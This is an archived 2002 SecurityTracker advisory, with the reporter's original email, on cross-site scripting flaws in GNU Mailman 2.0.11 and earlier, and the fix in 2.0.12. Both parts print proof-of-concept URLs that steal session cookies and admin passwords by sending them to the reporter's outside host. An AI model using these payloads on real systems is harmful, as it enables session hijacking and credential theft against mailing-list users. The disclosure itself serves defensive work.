SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (E-mail Server)  >  Mailman Vendors:  GNU [multiple authors]
Mailman E-mail Discussion List Software Has More Input Validation Holes That Allow Remote Users to Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1004844
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 26 2002
Impact:  Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): 2.0.11 and prior versions
Description:  Some additional input validation vulnerabilities were reported in the Mailman mailing list software. A remote user could conduct cross-site scripting attacks against Mailmain users.

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the vulnerable Mailman software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The following demonstration exploit URLs are provided:

http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/o nClick="window.open('http://www.office.ac/j.cgi?'+document.cookie);

http://mailman_site/mailman/subscribe/ml-name?info=<script>document.location%3D"http://www.office.a c/j.cgi?"%2Bdocument.cookie;</script>
Impact:  A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the vulnerable software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:  The vendor has released a fixed version (2.0.12), available at:

http://www.gnu.org/software/mailman/download.html
Vendor URL:  mail.python.org/pipermail/mailman-announce/2002-July/000043.html (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  office <office@office.ac>
Message History:   This archive entry has one or more follow-up message(s) listed below.
Aug 29 2002 (Red Hat Issues Fix for Red Hat Linux 7.2 and 7.3) Mailman E-mail Discussion List Software Has More Input Validation Holes That Allow Remote Users to Conduct Cross-Site Scripting Attacks   (bugzilla@redhat.com)
Red Hat has released a fix for Red Hat Linux 7.2 and 7.3.
Sep 4 2002 (Conectiva Issues Fix) Mailman E-mail Discussion List Software Has More Input Validation Holes That Allow Remote Users to Conduct Cross-Site Scripting Attacks   (secure@conectiva.com.br)
Conectiva has released a fix.


 Source Message Contents
Date:  Wed, 24 Jul 2002 17:03:30 +0900
From:  office <office@office.ac>
Subject:  cross-site scripting bug of Mailman

 

Mailman: cross-site scripting bug

Product: Mailman
Affected Version: 2.0.11 and under it
Vendor's URL: http://www.gnu.org/software/mailman/
Solution: Use fixed version 2.0.12 or later


Introduction:
------------
Mailman is software to help manage electronic mail discussion lists, much 
like Majordomo or Smartmail. And Mailman have web interface system.


Example:
-----------------
This is simple example for version 2.0.10:
You can recognize the vulnerability with this type of URL;
http://mailman_site/mailman_dirctory/admin/ml-name?"><script>alert("hello")<
/script>
and that prove that any (malicious) script code is possible on web 
interface part of Mailman.


For example, if you access to this URL with Internet Explorer (other 
browser is not affected by the URL), the page figure is similar to 
real one, but the password of admin you enter and submit are send 
to another malicious site (http://www.office.ac/). This URL are valid for version 2.0.10.

http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="></form><form/action="
http://www.office.ac/webform.cgi"/method="post"><br


And Mailman 2.0.11 still have vulnerabilities, if you access to these 
URL with Internet Explorer (other browser is not affected by these 
URL), your information in cookie about the mailman_site could be 
send another malicious site (http://www.office.ac/).

http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/onClick="window.open('http://w
ww.office.ac/j.cgi?'+document.cookie);

http://mailman_site/mailman/subscribe/ml-name?info=<script>document.location%3D"http://www
.office.ac/j.cgi?"%2Bdocument.cookie;</script>


Vendor's response:
--------------
The vendor were notified about first problem on 20th of May 2002. 
On same 20th May 2002, version 2.0.11 was released.
http://mail.python.org/pipermail/mailman-announce/2002-May/000042.html

And the vendor were notified about other problems on 21st of May 2002. 
The fixed version 2.0.12 was released on 11th of Jul 2002.
http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html


Solution:
--------------
Users should upgrade to Mailman 2.0.12 or later

--
office
office@ukky.net
office@office.ac
http://www.office.ac/


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC